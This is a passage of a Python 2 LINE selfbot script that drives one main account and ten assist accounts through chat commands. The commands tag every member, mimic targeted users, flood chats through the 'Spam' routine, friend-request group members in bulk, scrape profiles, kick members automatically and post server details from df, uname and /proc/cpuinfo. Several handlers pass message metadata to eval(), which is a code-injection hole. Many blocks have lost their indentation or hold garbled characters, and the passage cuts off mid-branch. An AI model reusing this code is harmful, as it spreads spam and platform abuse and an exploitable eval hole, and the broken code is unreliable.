    nama = [contact.mid for contact in group.members]
    cb = ""
    cb2 = ""
    strt = int(0)
    akh = int(0)
    for md in nama:
        akh = akh + int(6)
        cb += """{"S":"""+json.dumps(str(strt))+""","E":"""+json.dumps(str(akh))+""","M":"""+json.dumps(md)+"},"""
        strt = strt + int(7)
        akh = akh + 1
        cb2 += "@nrik \n"
    cb = (cb[:int(len(cb)-1)])  # drop the trailing comma
    msg.contentType = 0
    msg.text = cb2
    msg.contentMetadata ={'MENTION':'{"MENTIONEES":['+cb+']}','EMTVER':'4'}
    try:
        cl.sendMessage(msg)
    except Exception as error:
        print error
#-------------Tag All end---------------#
#---------------------------------------------------------
elif "1name:" in msg.text:
string = msg.text.replace("1name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki.getProfile()
profile.displayName = string
ki.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "2name:" in msg.text:
string = msg.text.replace("2name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki2.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "3name:" in msg.text:
string = msg.text.replace("3name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki3.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "4name:" in msg.text:
string = msg.text.replace("4name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki4.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "5name:" in msg.text:
string = msg.text.replace("5name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki5.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "6name:" in msg.text:
string = msg.text.replace("6name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki6.getProfile()
profile.displayName = string
ki6.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "7name:" in msg.text:
string = msg.text.replace("7name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki7.getProfile()
profile.displayName = string
ki7.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "8name:" in msg.text:
string = msg.text.replace("8name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki8.getProfile()
profile.displayName = string
ki8.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "9name:" in msg.text:
string = msg.text.replace("9name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki9.getProfile()
profile.displayName = string
ki9.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif "10name:" in msg.text:
string = msg.text.replace("10name:","")
if len(string.decode('utf-8')) <= 20:
profile = ki10.getProfile()
profile.displayName = string
ki10.updateProfile(profile)
cl.sendText(msg.to,"Update Names👉" + string + "👈")
#--------------------------------------------------------
elif msg.text.lower() == 'responsename':
profile = ki.getProfile()
text = profile.displayName + ""
ki.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ1")
profile = ki2.getProfile()
text = profile.displayName + ""
ki2.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ2")
profile = ki3.getProfile()
text = profile.displayName + ""
ki3.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ3")
profile = ki4.getProfile()
text = profile.displayName + ""
ki4.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ4")
profile = ki5.getProfile()
text = profile.displayName + ""
ki5.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ5")
profile = ki6.getProfile()
text = profile.displayName + ""
ki6.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ6")
profile = ki7.getProfile()
text = profile.displayName + ""
ki7.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ7")
profile = ki8.getProfile()
text = profile.displayName + ""
ki8.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ8")
profile = ki9.getProfile()
text = profile.displayName + ""
ki9.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ9")
profile = ki10.getProfile()
text = profile.displayName + ""
ki10.sendText(msg.to, "Re̶y̶Pr̶o̶ᵃˢⁱˢᵗ10")
#--------------------------------------------------------
elif "Mid:" in msg.text:
    # "Mid:<user id>" -- send a contact card (contentType 13) for that mid.
    mmid = msg.text.replace("Mid:","")
    msg.contentType = 13
    msg.contentMetadata = {"mid":mmid}
    cl.sendMessage(msg)
elif "Set member: " in msg.text:
    # Admin only: set the minimum member-count threshold used elsewhere.
    if msg.from_ in admin:
        jml = msg.text.replace("Set member: ","")
        wait["Members"] = int(jml)
        cl.sendText(msg.to, "Jumlah minimal member telah di set : "+jml)
elif ("Repadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
ki3.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Repdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
ki3.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
    # List all mimic targets by display name.
    if mimic["target"] == {}:
        ki3.sendText(msg.to,"Nothing")
    else:
        mc = "Target Mimic User:\n"
        for mi_d in mimic["target"]:
            mc += "?? "+cl.getContact(mi_d).displayName + "\n"
        ki3.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
    # Choose whose messages get mimicked: "me" or "target".
    # Only honored while mimic["copy"] is enabled.
    if mimic["copy"] == True:
        siapa = msg.text.replace("Mimic target ","")
        if siapa.rstrip(' ') == "me":
            mimic["copy2"] = "me"
            ki3.sendText(msg.to,"Mimic change to me")
        elif siapa.rstrip(' ') == "target":
            mimic["copy2"] = "target"
            ki3.sendText(msg.to,"Mimic change to target")
        else:
            ki3.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
    # "Mimic on" / "Mimic off" -- toggle message-echo mode.
    cmd = msg.text.replace("Mimic ","")
    if cmd == "on":
        if mimic["status"] == False:
            wait["Mimic"] = True
            mimic["status"] = True
            ki3.sendText(msg.to,"Reply Message on")
        else:
            cl.sendText(msg.to,"Sudah on")
    elif cmd == "off":
        if mimic["status"] == True:
            wait["Mimic"] = False
            mimic["status"] = False
            ki3.sendText(msg.to,"Reply Message off")
        else:
            cl.sendText(msg.to,"Sudah off")
elif "Add all" in msg.text:
    # Friend-request the first 33 members of the current group.
    thisgroup = cl.getGroups([msg.to])
    Mids = [contact.mid for contact in thisgroup[0].members]
    mi_d = Mids[:33]
    cl.findAndAddContactsByMids(mi_d)
    cl.sendText(msg.to,"Success Add all")
elif msg.text in ["Invite"]:
    # Arm invite mode; the next contact card received will be invited.
    wait["invite"] = True
    cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Spam"]:
    # Admin only: scripted multi-bot banter ("Tak Tun Tuang" song) -- the
    # assist bots take turns sending fixed lines into the chat.
    if msg.from_ in admin:
        ki.sendText(msg.to,"Aku belum mandi")
        ki2.sendText(msg.to,"Tak tun tuang")
        ki3.sendText(msg.to,"Tak tun tuang")
        ki3.sendText(msg.to,"Tapi masih cantik juga")
        ki4.sendText(msg.to,"Tak tun tuang")
        ki5.sendText(msg.to,"Tak tun tuang")
        ki6.sendText(msg.to,"apalagi kalau sudah mandi")
        ki7.sendText(msg.to,"Tak tun tuang")
        ki8.sendText(msg.to,"Pasti cantik sekali")
        ki9.sendText(msg.to,"yiha")
        ki10.sendText(msg.to,"Kalau orang lain melihatku")
        ki.sendText(msg.to,"Tak tun tuang")
        ki2.sendText(msg.to,"Badak aku taba bana")
        ki3.sendText(msg.to,"Tak tun tuang")
        ki4.sendText(msg.to,"Tak tuntuang")
        ki5.sendText(msg.to,"Tapi kalau langsuang diidu")
        ki6.sendText(msg.to,"Tak tun tuang")
        ki7.sendText(msg.to,"Atagfirullah baunya")
        ki8.sendText(msg.to,"Males lanjutin ah")
        ki9.sendText(msg.to,"Sepi bat")
        ki10.sendText(msg.to,"Iya sepi udah udah")
        ki.sendText(msg.to,"Gaada yang denger juga kita nyanyi")
        ki2.sendText(msg.to,"Nah")
        ki3.sendText(msg.to,"Mending gua makan dulu")
        ki4.sendText(msg.to,"Siyap")
        ki5.sendText(msg.to,"Okeh")
        ki6.sendText(msg.to,"Katanya owner kita Jomblo ya")
        ki7.sendText(msg.to,"Iya emang")
        ki8.sendText(msg.to,"Denger denger si lagi nyari pacar doi")
        ki9.sendText(msg.to,"Udah ah gosip mulu doain aja biar dapet")
elif "Getvid @" in msg.text:
    # "Getvid @Name" -- look members up by exact display name and send each
    # match's profile URL via sendVideoWithURL.
    print "[Command]dp executing"
    _name = msg.text.replace("Getvid @","")
    _nametarget = _name.rstrip(' ')
    gs = cl.getGroup(msg.to)
    targets = []
    for g in gs.members:
        if _nametarget == g.displayName:
            targets.append(g.mid)
    if targets == []:
        cl.sendText(msg.to,"Contact not found")
    else:
        for target in targets:
            try:
                contact = cl.getContact(target)
                # NOTE(review): this is the *picture* URL sent as a video;
                # a video profile usually needs a "/vp" suffix -- confirm
                # against the LINE CDN conventions before relying on it.
                path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
                cl.sendVideoWithURL(msg.to, path)
            except Exception as e:
                raise e
        print "[Command]dp executed"
elif "Group image" in msg.text:
    # Send the current group's icon as an image (via assist bot ki).
    group = cl.getGroup(msg.to)
    path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
    ki.sendImageWithURL(msg.to,path)
elif "Urlgroup image" in msg.text:
    # Send the group's icon URL as plain text.
    group = cl.getGroup(msg.to)
    path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
    cl.sendText(msg.to,path)
elif "Name" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = ki.getContact(key1)
cu = ki.channel.getCover(key1)
try:
ki.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
ki.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Profile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
ki.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
ki2.sendText(msg.to,"Profile Picture " + contact.displayName)
ki3.sendImageWithURL(msg.to,image)
ki4.sendText(msg.to,"Cover " + contact.displayName)
ki5.sendImageWithURL(msg.to,path)
except:
pass
elif "Contact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Info" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Bio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif msg.text.lower() == 'runtime':
eltime = time.time() - mulai
van = "Bot Sudah Berjalan Selama :\n"+waktu(eltime)
cl.sendText(msg.to,van)
ki.sendText(msg.to,van)
ki2.sendText(msg.to,van)
ki3.sendText(msg.to,van)
ki4.sendText(msg.to,van)
ki5.sendText(msg.to,van)
ki6.sendText(msg.to,van)
ki7.sendText(msg.to,van)
ki8.sendText(msg.to,van)
ki9.sendText(msg.to,van)
ki10.sendText(msg.to,van)
elif "Checkdate " in msg.text:
    # "Checkdate <date>" -- query a Google Apps Script service for birth
    # date / age / next-birthday / zodiac info and relay the JSON result.
    tanggal = msg.text.replace("Checkdate ","")
    r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
    data=r.text
    data=json.loads(data)
    lahir = data["data"]["lahir"]
    usia = data["data"]["usia"]
    ultah = data["data"]["ultah"]
    zodiak = data["data"]["zodiak"]
    cl.sendText(msg.to,"========== I N F O R M A S I ==========\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n========== I N F O R M A S I ==========")
elif msg.text in ["Kalender","Time","Waktu"]:
timeNow = datetime.now()
timeHours = datetime.strftime(timeNow,"(%H:%M)")
day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"]
hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"]
bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"]
inihari = datetime.today()
hr = inihari.strftime('%A')
bln = inihari.strftime('%m')
for i in range(len(day)):
if hr == day[i]: hasil = hari[i]
for k in range(0, len(bulan)):
if bln == str(k): bln = bulan[k-1]
rst = hasil + ", " + inihari.strftime('%d') + " - " + bln + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]"
cl.sendText(msg.to, rst)
elif "SearchID: " in msg.text:
    # "SearchID: <line id>" -- resolve a LINE user id to a contact card.
    userid = msg.text.replace("SearchID: ","")
    contact = cl.findContactsByUserid(userid)
    msg.contentType = 13
    msg.contentMetadata = {'mid': contact.mid}
    ki.sendMessage(msg)
elif "Searchid: " in msg.text:
    # Case-variant duplicate of the branch above (identical behavior).
    userid = msg.text.replace("Searchid: ","")
    contact = cl.findContactsByUserid(userid)
    msg.contentType = 13
    msg.contentMetadata = {'mid': contact.mid}
    ki.sendMessage(msg)
elif "removechat" in msg.text.lower():
if msg.from_ in admin:
try:
cl.removeAllMessages(op.param2)
ki.removeAllMessages(op.param2)
ki2.removeAllMessages(op.param2)
ki3.removeAllMessages(op.param2)
ki4.removeAllMessages(op.param2)
ki5.removeAllMessages(op.param2)
ki6.removeAllMessages(op.param2)
ki7.removeAllMessages(op.param2)
ki8.removeAllMessages(op.param2)
ki9.removeAllMessages(op.param2)
ki10.removeAllMessages(op.param2)
print "[Command] Remove Chat"
cl.sendText(msg.to,"Done")
ki.sendText(msg.to,"Done")
ki2.sendText(msg.to,"Done")
ki3.sendText(msg.to,"Done")
ki4.sendText(msg.to,"Done")
ki5.sendText(msg.to,"Done")
ki6.sendText(msg.to,"Done")
ki7.sendText(msg.to,"Done")
ki8.sendText(msg.to,"Done")
ki9.sendText(msg.to,"Done")
ki10.sendText(msg.to,"All Messages From Owner To Bot Have Been Deleted Successfully")
except Exception as error:
print error
cl.sendText(msg.to,"Error")
elif "apakah " in msg.text:
    # "apakah <question>" -- answer yes/no-style questions with a random
    # choice, spoken via Google TTS. The question text itself is unused.
    apk = msg.text.replace("apakah ","")
    rnd = ["Ya","Tidak","Bisa Jadi","Mungkin"]
    p = random.choice(rnd)
    lang = 'id'
    tts = gTTS(text=p, lang=lang)
    tts.save("hasil.mp3")
    ki.sendAudio(msg.to,"hasil.mp3")
elif "hari " in msg.text:
    # "hari <question>" -- random day of the week, spoken.
    apk = msg.text.replace("hari ","")
    rnd = ["Senin","Selasa","Rabu","Kamis","Jumat","Sabtu","Minggu"]
    p = random.choice(rnd)
    lang = 'id'
    tts = gTTS(text=p, lang=lang)
    tts.save("hasil.mp3")
    ki2.sendAudio(msg.to,"hasil.mp3")
elif "berapa " in msg.text:
    # "berapa <question>" -- random percentage, spoken.
    apk = msg.text.replace("berapa ","")
    rnd = ['10%','20%','30%','40%','50%','60%','70%','80%','90%','100%','0%']
    p = random.choice(rnd)
    lang = 'id'
    tts = gTTS(text=p, lang=lang)
    tts.save("hasil.mp3")
    ki3.sendAudio(msg.to,"hasil.mp3")
elif "berapakah " in msg.text:
    # "berapakah <question>" -- random number 1..10 (or none), spoken.
    apk = msg.text.replace("berapakah ","")
    rnd = ['1','2','3','4','5','6','7','8','9','10','Tidak Ada']
    p = random.choice(rnd)
    lang = 'id'
    tts = gTTS(text=p, lang=lang)
    tts.save("hasil.mp3")
    ki4.sendAudio(msg.to,"hasil.mp3")
elif "kapan " in msg.text:
    # "kapan <question>" -- random "when" answer, spoken.
    apk = msg.text.replace("kapan ","")
    rnd = ["kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi","Tidak Akan Pernah"]
    p = random.choice(rnd)
    lang = 'id'
    tts = gTTS(text=p, lang=lang)
    tts.save("hasil.mp3")
    ki5.sendAudio(msg.to,"hasil.mp3")
elif msg.text in ["Simisimi on","Simisimi:on"]:
    # Enable SimSimi auto-chat for this room.
    settings["simiSimi"][msg.to] = True
    wait["Simi"] = True
    ki2.sendText(msg.to," Simisimi Di Aktifkan")
elif msg.text in ["Simisimi off","Simisimi:off"]:
    # Disable SimSimi auto-chat for this room.
    settings["simiSimi"][msg.to] = False
    wait["Simi"] = False
    ki2.sendText(msg.to,"Simisimi Di Nonaktifkan")
elif msg.text.lower() == 'system':
    # Report server disk usage (`df -h`).
    botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0]
    ki.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===")
elif msg.text.lower() == 'kernel':
    # Report kernel/OS info (`uname -srvmpio`).
    botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0]
    ki.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===")
elif msg.text.lower() == 'cpu':
    # Report CPU info (/proc/cpuinfo).
    botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0]
    ki.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===")
elif msg.text in ["Notif on"]:
    # Enable join greetings; also forces the join-kicker off.
    if wait["Sambutan"] == True:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Sambutan Di Aktifkanヾ(*´∀`*)ノ")
    else:
        wait["Sambutan"] = True
        wait["joinkick"] = False
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Sudah Onヽ(´▽`)/")
elif msg.text in ["Notif off"]:
    # Disable join greetings.
    if wait["Sambutan"] == False:
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Sambutan Di Nonaktifkan( ^∇^)")
    else:
        wait["Sambutan"] = False
        if wait["lang"] == "JP":
            cl.sendText(msg.to,"Sudah Off(p′︵‵。)")
elif "Sider on" in msg.text:
    # Start lurker ("sider") detection for this room: remember the current
    # message id as the read-point and reset the tracked-reader list.
    try:
        del cctv['point'][msg.to]
        del cctv['sidermem'][msg.to]
        del cctv['cyduk'][msg.to]
    except:
        pass
    cctv['point'][msg.to] = msg.id
    cctv['sidermem'][msg.to] = ""
    cctv['cyduk'][msg.to]=True
    wait["Sider"] = True
    cl.sendText(msg.to,"Siap On Cek Sider")
elif "Sider off" in msg.text:
    # Stop lurker detection (only if it was set for this room).
    if msg.to in cctv['point']:
        cctv['cyduk'][msg.to]=False
        wait["Sider"] = False
        cl.sendText(msg.to, "Cek Sider Off")
    else:
        cl.sendText(msg.to, "Heh Belom Di Set")
elif "Say " in msg.text:
    # "Say <text>" -- speak the text in Indonesian via Google TTS.
    say = msg.text.replace("Say ","")
    lang = 'id'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    ki.sendAudio(msg.to,"hasil.mp3")
elif "Say-en " in msg.text:
    # "Say-en <text>" -- speak in English.
    say = msg.text.replace("Say-en ","")
    lang = 'en'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    cl.sendAudio(msg.to,"hasil.mp3")
elif "Say-jp " in msg.text:
    # "Say-jp <text>" -- speak in Japanese.
    say = msg.text.replace("Say-jp ","")
    lang = 'ja'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    cl.sendAudio(msg.to,"hasil.mp3")
elif "Say welcome" in msg.text:
    # Speak a welcome message containing the current group's name.
    gs = cl.getGroup(msg.to)
    say = msg.text.replace("Say welcome","Selamat Datang Di "+ gs.name)
    lang = 'id'
    tts = gTTS(text=say, lang=lang)
    tts.save("hasil.mp3")
    cl.sendAudio(msg.to,"hasil.mp3")
elif msg.text.lower() == 'protect on':
if wait["protect"] == True:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Protect on🔓✍")
ki2.sendText(msg.to,"Auto Protect on🔓✍")
ki3.sendText(msg.to,"Auto Protect on🔓✍")
ki4.sendText(msg.to,"Auto Protect on🔓✍")
ki5.sendText(msg.to,"Auto Protect on🔓✍")
ki6.sendText(msg.to,"Auto Protect on🔓✍")
ki7.sendText(msg.to,"Auto Protect on🔓✍")
ki8.sendText(msg.to,"Auto Protect on🔓✍")
ki9.sendText(msg.to,"Auto Protect on🔓✍")
ki10.sendText(msg.to,"Auto Protect on🔓✍")
else:
ki.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
else:
wait["protect"] = True
if wait["lang"] == "JP":
ki.sendText(msg.to,"Auto Protect on🔓✍")
ki2.sendText(msg.to,"Auto Protect on🔓✍")
ki3.sendText(msg.to,"Auto Protect on🔓✍")
ki4.sendText(msg.to,"Auto Protect on🔓✍")
ki5.sendText(msg.to,"Auto Protect on🔓✍")
ki6.sendText(msg.to,"Auto Protect on🔓✍")
ki7.sendText(msg.to,"Auto Protect on🔓✍")
ki8.sendText(msg.to,"Auto Protect on🔓✍")
ki9.sendText(msg.to,"Auto Protect on🔓✍")
ki10.sendText(msg.to,"Auto Protect on🔓✍")
else:
ki.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'qrprotect on':
    # Enable QR/link protection.
    if wait["linkprotect"] == True:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Qr code On✍")
        else:
            ki2.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
    else:
        wait["linkprotect"] = True
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Already on✍")
        else:
            ki2.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'invitepro on':
    # Enable invite protection.
    if wait["inviteprotect"] == True:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Invite protect On✍")
        else:
            ki.sendText(msg.to,"Hal ini sudah terbuka ô€¨����👈")
    else:
        wait["inviteprotect"] = True
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Already on✍")
        else:
            ki.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'cancelprotect on':
    # Enable invite-cancel protection.
    if wait["cancelprotect"] == True:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Cancel Protect on✍ 👈")
        else:
            ki2.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
    else:
        wait["cancelprotect"] = True
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Already on✍")
        else:
            ki2.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'auto join on':
    # Enable auto-join of group invitations.
    if wait["autoJoin"] == True:
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Auto Login on✍")
        else:
            ki.sendText(msg.to,"Hal ini sudah terbuka ô€¨👈")
    else:
        wait["autoJoin"] = True
        if wait["lang"] == "JP":
            ki.sendText(msg.to,"Already on✍")
        else:
            ki.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'kicker on':
    # Enable the join-kicker (both message variants are identical).
    if wait["joinkick"] == True:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Kicker Auto set On✍")
        else:
            ki2.sendText(msg.to,"Kicker Auto set On✍")
    else:
        wait["joinkick"] = True
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Kicker Auto set On✍")
        else:
            ki2.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'kicker off':
    # Disable the join-kicker.
    if wait["joinkick"] == False:
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Kicker Auto set Off✍")
        else:
            ki2.sendText(msg.to,"Kicker Auto set Off✍")
    else:
        wait["joinkick"] = False
        if wait["lang"] == "JP":
            ki2.sendText(msg.to,"Kicker Auto set Off✍")
        else:
            ki2.sendText(msg.to,"It is already Off ô€¨")
elif msg.text.lower() == 'autokick on':
    # Enable auto-kick.
    if wait["AutoKick"] == True:
        if wait["lang"] == "JP":
            ki3.sendText(msg.to,"Auto Kick set On✍")
        else:
            ki3.sendText(msg.to,"Auto Kick set On✍")
    else:
        wait["AutoKick"] = True
        if wait["lang"] == "JP":
            ki3.sendText(msg.to,"Auto Kick set On✍")
        else:
            ki3.sendText(msg.to,"It is already On ô€¨")
elif msg.text.lower() == 'autokick off':
    # Disable auto-kick.
    if wait["AutoKick"] == False:
        if wait["lang"] == "JP":
            ki3.sendText(msg.to,"Auto Kick set Off✍")
        else:
            ki3.sendText(msg.to,"Auto Kick set Off✍")
    else:
        wait["AutoKick"] = False
        if wait["lang"] == "JP":
            ki3.sendText(msg.to,"Auto Kick set Off✍")
        else:
            ki3.sendText(msg.to,"It is already Off ô€¨")
elif msg.text.lower() == 'blocklist':
blockedlist = ki.getBlockedContactIds()
ki.sendText(msg.to, "Please wait ✍")
kontak = cl.getContacts(blockedlist)
num=1
msgs="User Blocked List\n"
for ids in kontak:
msgs+="\n%i. %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n\nTotal %i blocked user(s)" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Allprotect on","Mode on"]:
    # Admin only: turn every protection flag on in one command.
    # NOTE(review): the first check treats "inviteprotect" as a proxy for
    # "everything already on"; otherwise each remaining flag is toggled and
    # announced by a different assist bot in sequence.
    if msg.from_ in admin:
        if wait["inviteprotect"] == True:
            if wait["lang"] == "JP":
                ki.sendText(msg.to,"All Protect on🔓✍")
                ki2.sendText(msg.to,"All Protect on🔓✍")
                ki3.sendText(msg.to,"All Protect on🔓✍")
                ki4.sendText(msg.to,"All Protect on🔓✍")
                ki5.sendText(msg.to,"All Protect on🔓✍")
                ki6.sendText(msg.to,"All Protect on🔓✍")
                ki7.sendText(msg.to,"All Protect on🔓✍")
                ki8.sendText(msg.to,"All Protect on🔓✍")
                ki9.sendText(msg.to,"All Protect on🔓✍")
                ki10.sendText(msg.to,"All Protect on🔓✍")
            else:
                # Non-JP path sends an empty message (kept from original).
                ki.sendText(msg.to,"")
        else:
            wait["inviteprotect"] = True
            if wait["lang"] == "JP":
                ki.sendText(msg.to,"Invite Protect set On✍")
        if wait["cancelprotect"] == True:
            if wait["lang"] == "JP":
                ki2.sendText(msg.to,"Cancel Protect set On✍")
            else:
                ki2.sendText(msg.to,"Cancel Protect set On✍")
        else:
            wait["cancelprotect"] = True
            if wait["lang"] == "JP":
                ki2.sendText(msg.to,"Cancel Protect set On✍")
        if wait["protect"] == True:
            if wait["lang"] == "JP":
                ki3.sendText(msg.to,"Protect set On✍")
            else:
                ki3.sendText(msg.to,"Protect set On✍")
        else:
            wait["protect"] = True
            if wait["lang"] == "JP":
                ki3.sendText(msg.to,"Protect set On✍")
            else:
                ki3.sendText(msg.to,"Protect set on✍")
        if wait["linkprotect"] == True:
            if wait["lang"] == "JP":
                ki4.sendText(msg.to,"Link Protect set On✍")
            else:
                ki4.sendText(msg.to,"Link Protect set On✍")
        else:
            wait["linkprotect"] = True
            if wait["lang"] == "JP":
                ki4.sendText(msg.to,"Link Protect set On✍")
            else:
                ki4.sendText(msg.to,"Link Protect set On✍")
        if wait["joinkick"] == True:
            if wait["lang"] == "JP":
                ki5.sendText(msg.to,"Kicker Protect set On✍")
            else:
                ki5.sendText(msg.to,"Kicker Protect set On✍")
        else:
            wait["joinkick"] = True
            if wait["lang"] == "JP":
                ki5.sendText(msg.to,"Kicker Protect set On✍")
            else:
                ki5.sendText(msg.to,"Kicker Protect set On✍")
        if wait["AutoKick"] == True:
            if wait["lang"] == "JP":
                ki6.sendText(msg.to,"Auto Kick set On✍")
            else:
                ki6.sendText(msg.to,"Auto Kick set On✍")
        else:
            wait["AutoKick"] = True
            if wait["lang"] == "JP":
                ki6.sendText(msg.to,"Auto Kick set On✍")
            else:
                ki6.sendText(msg.to,"Auto Kick set On✍")
elif msg.text in ["Allprotect off","Mode off"]:
    # Admin only: mirror of "Allprotect on" -- turn every protection flag
    # off. NOTE(review): the final announcer here is ki5, not ki6 as in the
    # "on" branch (kept from the original).
    if msg.from_ in admin:
        if wait["inviteprotect"] == False:
            if wait["lang"] == "JP":
